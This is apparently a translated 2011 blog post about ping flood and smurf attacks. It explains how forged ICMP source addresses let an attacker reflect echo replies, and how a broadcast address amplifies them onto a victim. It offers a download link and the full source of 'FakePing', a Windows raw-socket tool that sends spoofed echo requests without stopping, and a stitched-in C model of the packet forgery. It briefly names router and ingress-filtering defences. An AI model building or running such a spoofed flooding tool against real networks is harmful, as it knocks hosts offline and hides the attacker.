
Friday, 11 November 2011

Ping Flood Attack

Author: shotgun

Lately a number of people have again been calling on everyone to go and ping some website or other to death. I do not understand politics, but technically speaking every denial-of-service method has to satisfy one condition: spend the least resources of your own to cause the greatest consumption on the victim's side. Everyone pinging together is not only odd (it spends the greatest resources to inflict the least harm on the other side), it is also laughable: the people's war belongs to fifty-odd years ago, and in the Internet age sheer numbers get you nowhere.

One basic fact: the centre of the Internet is in the United States, and the Chinese part is only a small branch of it (roughly the equivalent of a single US metropolitan network). The fibre links to North America are called the "North American exit". What does exit mean? A gate; in other words, a bottleneck. So if everyone pings away, the first thing to die is China's exit gateway (China's bandwidth to North America is only of the order of gigabits; is that wide? can it take everyone squeezing out through it at once?). Of course, once the North American exit is down we can no longer see American sites, and those who like to play Ah Q can tell themselves and others: "We blew up America!" (Strange? Yet not long ago someone was circulating a home-made page of the White House "hacked".) But in that case we might as well shut the national gate, disconnect from the Internet and dream of being a strong nation at home, imagining we are still in the mighty Tang dynasty with the whole world coming to pay tribute.

Enough chatter; today we are talking about ping. Ping is a tool that probes whether a host exists by sending an ICMP echo request (type 8, code 0). Long ago some operating systems (Windows 95, for example) could not handle oversized ping packets, which gave rise to the Ping of Death (crash the other side with a huge ping packet, or fill the network with them). With newer operating systems, more bandwidth and faster hardware, large ping packets have little effect today (distributed attacks excepted). If you insist on attacking another host with ping packets, you have to exploit some other property of TCP/IP or a weakness in the network topology to amplify the attack (so-called positive feedback).

Under normal circumstances a ping goes like this:
Host A sends an ICMP 8,0 (echo request) packet to host B
Host B sends an ICMP 0,0 (echo reply) packet back to host A
Because ICMP sits directly on IP, which is connectionless and never verifies the source address of a packet, this gives us an opening. Suppose host A now sends its ICMP 8,0 packet disguised as host C. What happens? Obviously host B takes the packet for one sent by host C and replies to host C. The structure is:

         disguised as host C                 misdirected reply
Host A ---------------------> Host B ------------------> Host C

In this case host A only has to keep sending ping packets and never has to process the echo replies, so the attacker's own cost drops while two hosts absorb the traffic: host B answers every request and host C receives every reply, so both are in effect targets. Note that there is no amplification yet; each reply is the same size as the request that triggered it. What the forged source buys is cover: nothing in the exchange points back at host A, which makes this a covert way to hit two birds with one stone.

The above is easy to implement with SOCK_RAW and a forged IP header, but even with the load spread over two hosts, a robust operating system with plenty of bandwidth will hardly notice. Do we organise a mass movement again? Better not; let the enemy do the amplifying for us. TCP/IP has a concept called broadcast: a broadcast address is one that every host on the local network receives packets for (like a radio station). So if... could it be... yes! If we send an ICMP echo to a broadcast address (that is, ping the broadcast address), we get a great many answers: every host on the Ethernet segment that accepts broadcast packets answers with an ICMP_ECHOREPLY. To try it, ping your LAN's broadcast address from a unix machine and you will see many responses marked as DUP, i.e. duplicate answers. On Windows you will not see this, because Microsoft's ping program does not unpack multiple responses: it keeps the first reply and discards the rest. Windows also does not answer packets sent to the broadcast address by default, so you had best test on a LAN with plenty of unix hosts.

By now you have surely worked out what I am after? Heh heh, that's right: when we send a ping request to a broadcast address disguised as the victim, every host behind that broadcast address answers the request (to the victim, naturally, since each of them believes the victim did the pinging). That amounts to N times the attack intensity! (N = the number of hosts behind the broadcast address that answer ping packets.) This amplified form is the well-known smurf attack, and two controls defeat it: the router in front of the segment must not forward directed broadcasts arriving from outside (the default on routers since RFC 2644), and the attacker's upstream should drop packets whose source address it could not have originated (BCP 38 ingress filtering), so the forged request never leaves the attacker's network.
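To make the two exchanges above concrete, here is an added example in portable C that is not part of Shotgun's article and not his FakePing code: it builds the forged echo request, shows what a receiving host does with it (answer the IP source field, whatever the sender wrote there) and then runs the broadcast case to count how many bytes land on the victim for one request sent. The addresses, the /24 layout with hosts .1 to .N answering, the 1500-byte MTU and the filler byte are assumptions made for illustration.

```c
/* Added example (not Shotgun's FakePing): a portable model of the forged echo request
 * and of what the hosts receiving it do. Addresses, the /24 layout, hosts .1 .. .N
 * answering, and the 1500-byte MTU are all assumptions made for illustration. */
#include <stdint.h>
#include <string.h>

#define IP_HDR_LEN   20
#define ICMP_HDR_LEN 8
#define MAX_PKT      1500   /* assumption: one Ethernet frame, no fragmentation */

typedef struct { uint8_t bytes[MAX_PKT]; size_t len; } packet_t;

static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static void put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)(v >> 16)); put16(p + 2, (uint16_t)v); }
static uint16_t get16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t get32(const uint8_t *p) { return ((uint32_t)get16(p) << 16) | get16(p + 2); }
uint32_t ip4(uint8_t a, uint8_t b, uint8_t c, uint8_t d) { return ((uint32_t)a << 24) | ((uint32_t)b << 16) | ((uint32_t)c << 8) | d; }

/* RFC 1071 one's-complement checksum; verifying a packet whose checksum field is filled in yields 0. */
uint16_t inet_checksum(const uint8_t *data, size_t len)
{
    uint32_t sum = 0;
    for (; len > 1; len -= 2, data += 2) sum += get16(data);
    if (len) sum += (uint32_t)data[0] << 8;      /* odd trailing byte, zero padded */
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* IPv4 datagram carrying an ICMP echo (type 8 = request, 0 = reply). The IP checksum covers
 * the 20-byte header only, the ICMP checksum the ICMP header plus payload. -1 if it will not fit. */
int build_icmp_echo(packet_t *pkt, uint8_t type, uint32_t src, uint32_t dst,
                    uint16_t id, uint16_t seq, const uint8_t *payload, size_t plen)
{
    size_t total = IP_HDR_LEN + ICMP_HDR_LEN + plen;
    uint8_t *ip = pkt->bytes, *icmp = pkt->bytes + IP_HDR_LEN;
    if (total > MAX_PKT) return -1;
    memset(ip, 0, total);
    ip[0] = 0x45;                                /* version 4, IHL = 5 words */
    put16(ip + 2, (uint16_t)total);
    put16(ip + 4, 1);                            /* identification */
    ip[8] = 128; ip[9] = 1;                      /* TTL, protocol = ICMP */
    put32(ip + 12, src);                         /* nothing on the path verifies this field */
    put32(ip + 16, dst);
    put16(ip + 10, inet_checksum(ip, IP_HDR_LEN));
    icmp[0] = type;                              /* code byte stays 0 */
    put16(icmp + 4, id); put16(icmp + 6, seq);
    memcpy(icmp + ICMP_HDR_LEN, payload, plen);
    put16(icmp + 2, inet_checksum(icmp, ICMP_HDR_LEN + plen));
    pkt->len = total;
    return 0;
}

/* Receiver-side check: IPv4 without options, ICMP, consistent length, both checksums verify. */
int icmp_echo_valid(const packet_t *pkt)
{
    if (pkt->len < IP_HDR_LEN + ICMP_HDR_LEN || pkt->bytes[0] != 0x45) return 0;
    if (pkt->bytes[9] != 1 || (size_t)get16(pkt->bytes + 2) != pkt->len) return 0;
    if (inet_checksum(pkt->bytes, IP_HDR_LEN) != 0) return 0;
    return inet_checksum(pkt->bytes + IP_HDR_LEN, pkt->len - IP_HDR_LEN) == 0;
}

/* What host B does with an echo request: copy id, sequence and data into a reply addressed to
 * whatever the IP source field says, i.e. host C when the source is forged. -1 if not a valid request. */
int reflect_echo(const packet_t *req, uint32_t responder, packet_t *reply)
{
    const uint8_t *icmp = req->bytes + IP_HDR_LEN;
    if (!icmp_echo_valid(req) || icmp[0] != 8) return -1;
    return build_icmp_echo(reply, 0, responder, get32(req->bytes + 12), get16(icmp + 4),
                           get16(icmp + 6), icmp + ICMP_HDR_LEN, req->len - IP_HDR_LEN - ICMP_HDR_LEN);
}

/* Plain spoofing (A -> B -> C): where does B's reply to a request forged from spoofed_src go? */
uint32_t reply_destination(uint32_t spoofed_src, uint32_t target)
{
    uint8_t data[32];
    packet_t req, reply;
    memset(data, 'E', sizeof data);              /* the filler byte FakePing uses */
    if (build_icmp_echo(&req, 8, spoofed_src, target, 2, 999, data, sizeof data) != 0) return 0;
    if (reflect_echo(&req, target, &reply) != 0) return 0;
    return get32(reply.bytes + 16);
}

/* Broadcast case: one forged request to the directed broadcast of a /24, answered by hosts .1 .. .N.
 * Returns the bytes the victim receives for that single request, 0 if the request cannot be built. */
size_t smurf_bytes_to_victim(uint32_t victim, uint32_t bcast, unsigned responders, size_t plen)
{
    uint8_t data[MAX_PKT];
    packet_t req, reply;
    size_t delivered = 0;
    unsigned i;
    if (plen > sizeof data) return 0;
    memset(data, 'E', plen);
    if (build_icmp_echo(&req, 8, victim, bcast, 2, 999, data, plen) != 0) return 0;
    for (i = 1; i <= responders && i < 255; i++) {
        if (reflect_echo(&req, (bcast & 0xffffff00u) | i, &reply) == 0 && get32(reply.bytes + 16) == victim)
            delivered += reply.len;
    }
    return delivered;
}
```

With the page's own numbers (a 32-byte payload, so a 60-byte request) and a constructed segment of 50 answering hosts, `smurf_bytes_to_victim(ip4(10, 0, 0, 23), ip4(192, 168, 15, 255), 50, 32)` returns 3000: fifty 60-byte replies for one 60-byte request, which is the N-fold factor the paragraph describes. Unlike FakePing, the IP checksum here is computed over the header alone and the total-length field includes the payload, so the packet verifies on any receiver without relying on the sending stack to patch it up.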

I wrote a tool called FakePing; it can be downloaded from Http://www.patching.net/shotgun/FakePing.exe. Usage: FakePing.exe FakeIP TargetIP [PacketSize]. If TargetIP is a broadcast address, then FakeIP is the host being attacked. The program is written for the raw sockets of Windows 2000; Windows XP SP2 and later restrict what raw sockets may send, so do not expect it to run unchanged there.
The source is below (written in a hurry, the code is rather messy, forgive me):
//////////////////////////////////////////////////////////////////////////
//                                                                      //
//  FakePing For Win2K by Shotgun                                       //
//                                                                      //
//  Released: [2001.4]                                                  //
//  Author:   [Shotgun]                                                 //
//  Homepage:                                                           //
//            [http://IT.Xici.Net]                                      //
//            [http://WWW.Patching.Net]                                 //
//                                                                      //
//////////////////////////////////////////////////////////////////////////
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SEQ 0x28376839
#define STATUS_FAILED 0xFFFF // error return value

typedef struct _iphdr // IP header
{
    unsigned char h_verlen;        // 4-bit header length, 4-bit IP version
    unsigned char tos;             // 8-bit type of service (TOS)
    unsigned short total_len;      // 16-bit total length (bytes)
    unsigned short ident;          // 16-bit identification
    unsigned short frag_and_flags; // 3 flag bits and 13-bit fragment offset
    unsigned char ttl;             // 8-bit time to live (TTL)
    unsigned char proto;           // 8-bit protocol (TCP, UDP or other)
    unsigned short checksum;       // 16-bit IP header checksum
    unsigned int sourceIP;         // 32-bit source IP address
    unsigned int destIP;           // 32-bit destination IP address
} IP_HEADER;

// ICMP header
typedef struct _ihdr
{
    BYTE i_type;     // 8-bit type
    BYTE i_code;     // 8-bit code
    USHORT i_cksum;  // 16-bit checksum
    USHORT i_id;     // identifier (usually the process ID)
    USHORT i_seq;    // sequence number
    ULONG timestamp; // timestamp (strictly the first 4 bytes of the echo data)
} ICMP_HEADER;

// checksum: compute the Internet (one's-complement) checksum over a buffer
USHORT checksum(USHORT *buffer, int size)
{
    unsigned long cksum = 0;
    while (size > 1) {
        cksum += *buffer++;
        size -= sizeof(USHORT);
    }
    if (size) {
        cksum += *(UCHAR *)buffer; // odd trailing byte
    }
    cksum = (cksum >> 16) + (cksum & 0xffff);
    cksum += (cksum >> 16);
    return (USHORT)(~cksum);
}

// FakePing main function
int main(int argc, char **argv)
{
    int datasize, ErrorCode, counter, flag;
    int TimeOut = 2000, SendSEQ = 0, PacketSize = 32;
    char SendBuf[65535] = {0};
    WSADATA wsaData;
    SOCKET SockRaw = (SOCKET)NULL;
    struct sockaddr_in DestAddr;
    IP_HEADER ip_header;
    ICMP_HEADER icmp_header;
    char FakeSourceIp[20], DestIp[20];
    // parse the command line
    if (argc < 3)
    {
        printf("FakePing by Shotgun\n");
        printf("\tThis program can do Ping-Flooding from a FakeIP\n");
        printf("\tUsing a BroadCast IP as the DestinationIp will enhance the effect\n");
        printf("Email:\n");
        printf("\tShotgun@Xici.Net\n");
        printf("HomePage:\n");
        printf("\thttp://It.Xici.Net\n");
        printf("\thttp://www.Patching.Net\n");
        printf("USAGE:\n\tFakePing.exe FakeSourceIp DestinationIp [PacketSize]\n");
        printf("Example:\n");
        printf("\tFakePing.exe 192.168.15.23 192.168.15.255\n");
        printf("\tFakePing.exe 192.168.15.23 192.168.15.200 6400\n");
        exit(0);
    }
    // bounded copies: a dotted-quad address never needs more than 15 characters
    strncpy(FakeSourceIp, argv[1], sizeof(FakeSourceIp) - 1);
    FakeSourceIp[sizeof(FakeSourceIp) - 1] = '\0';
    strncpy(DestIp, argv[2], sizeof(DestIp) - 1);
    DestIp[sizeof(DestIp) - 1] = '\0';
    if (argc > 3) PacketSize = atoi(argv[3]);
    if (PacketSize < 0 || PacketSize > 60000)
    {
        printf("Error! Packet size too big, must <60K\n");
        exit(0);
    }
    printf("Now Fake %s Ping %s using Packet size=%d bytes\n",
           FakeSourceIp, DestIp, PacketSize);
    printf("\tCtrl+C to Quit\n");
    // initialise Winsock and open the raw socket
    if ((ErrorCode = WSAStartup(MAKEWORD(2, 1), &wsaData)) != 0)
    {
        fprintf(stderr, "WSAStartup failed: %d\n", ErrorCode);
        ExitProcess(STATUS_FAILED);
    }
    if ((SockRaw = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET)
    {
        fprintf(stderr, "WSASocket() failed: %d\n", WSAGetLastError());
        ExitProcess(STATUS_FAILED);
    }
    flag = TRUE;
    // set IP_HDRINCL so that we supply the IP header ourselves (this is what allows the forged source)
    ErrorCode = setsockopt(SockRaw, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(int));
    if (ErrorCode == SOCKET_ERROR)
        printf("Set IP_HDRINCL Error!\n");
    __try {
        // set the send timeout
        ErrorCode = setsockopt(SockRaw, SOL_SOCKET, SO_SNDTIMEO, (char *)&TimeOut, sizeof(TimeOut));
        if (ErrorCode == SOCKET_ERROR)
        {
            fprintf(stderr, "Failed to set send TimeOut: %d\n", WSAGetLastError());
            __leave;
        }
        memset(&DestAddr, 0, sizeof(DestAddr));
        DestAddr.sin_family = AF_INET;
        DestAddr.sin_addr.s_addr = inet_addr(DestIp);
        // total datagram size: IP header + ICMP header + payload
        datasize = sizeof(ip_header) + sizeof(icmp_header) + PacketSize;
        // fill in the IP header
        ip_header.h_verlen = (4 << 4 | sizeof(ip_header) / sizeof(unsigned long)); // high nibble version, low nibble header length in words
        ip_header.tos = 0;
        ip_header.total_len = htons((unsigned short)datasize); // total length must include the payload
        ip_header.ident = 1;                                   // identification
        ip_header.frag_and_flags = 0;                          // flags and fragment offset
        ip_header.ttl = 128;                                   // time to live
        ip_header.proto = IPPROTO_ICMP;                        // protocol
        ip_header.checksum = 0;                                // zero while the header checksum is computed
        ip_header.sourceIP = inet_addr(FakeSourceIp);          // forged source address
        ip_header.destIP = inet_addr(DestIp);                  // destination address
        // fill in the ICMP header
        icmp_header.i_type = 8; // echo request
        icmp_header.i_code = 0;
        icmp_header.i_cksum = 0;
        icmp_header.i_id = 2;
        icmp_header.timestamp = 999;
        icmp_header.i_seq = 999;
        // the ICMP checksum covers the ICMP header plus the payload
        memcpy(SendBuf + sizeof(ip_header), &icmp_header, sizeof(icmp_header));
        memset(SendBuf + sizeof(ip_header) + sizeof(icmp_header), 'E', PacketSize);
        icmp_header.i_cksum = checksum((USHORT *)(SendBuf + sizeof(ip_header)), sizeof(icmp_header) + PacketSize);
        memcpy(SendBuf + sizeof(ip_header), &icmp_header, sizeof(icmp_header));
        // the IP checksum covers the IP header only (the original computed it over the whole datagram)
        memcpy(SendBuf, &ip_header, sizeof(ip_header));
        ip_header.checksum = checksum((USHORT *)SendBuf, sizeof(ip_header));
        memcpy(SendBuf, &ip_header, sizeof(ip_header));
        while (1)
        {
            Sleep(100);
            printf(".");
            for (counter = 0; counter < 1024; counter++)
            {
                // send the ICMP packet
                ErrorCode = sendto(SockRaw, SendBuf, datasize, 0, (struct sockaddr *)&DestAddr, sizeof(DestAddr));
                if (ErrorCode == SOCKET_ERROR) printf("\nSend Error:%d\n", GetLastError());
            }
        }
    } // end of try
    __finally {
        if (SockRaw != INVALID_SOCKET) closesocket(SockRaw);
        WSACleanup();
    }
    return 0;
}

Conclusion:
Patriotism is necessary and enthusiasm indispensable, but technology tolerates no pretence and no impulsiveness; it has to be studied honestly and patiently. FakePing is nothing new on the Internet; the Americans we so despise for attacking us implemented it long ago. Do we really still need to organise tens of thousands of people to hammer the Internet exit? Archimedes, relying on wisdom and knowledge, once defended his home with mirrors. Must we still rely on impulse and blindness to make the country strong and the people prosperous? (中华补天)
